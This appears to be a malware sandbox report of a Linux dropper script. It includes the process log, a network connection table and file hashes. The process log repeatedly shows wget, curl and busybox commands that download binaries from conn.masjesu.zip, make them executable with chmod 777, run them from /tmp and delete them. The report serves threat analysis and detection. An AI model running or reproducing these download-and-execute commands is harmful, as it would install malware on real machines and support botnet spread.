[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/chmod
[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/rm
[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/chmod
[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/rm
[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/chmod
[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/rm
[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/chmod
[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/rm
[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/chmod
[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/rm
[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/chmod
[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/rm
[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/chmod
[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/rm
[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/chmod
[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/rm
[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/chmod
[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/rm
[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 01:07
Reported
2024-10-25 01:10
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp |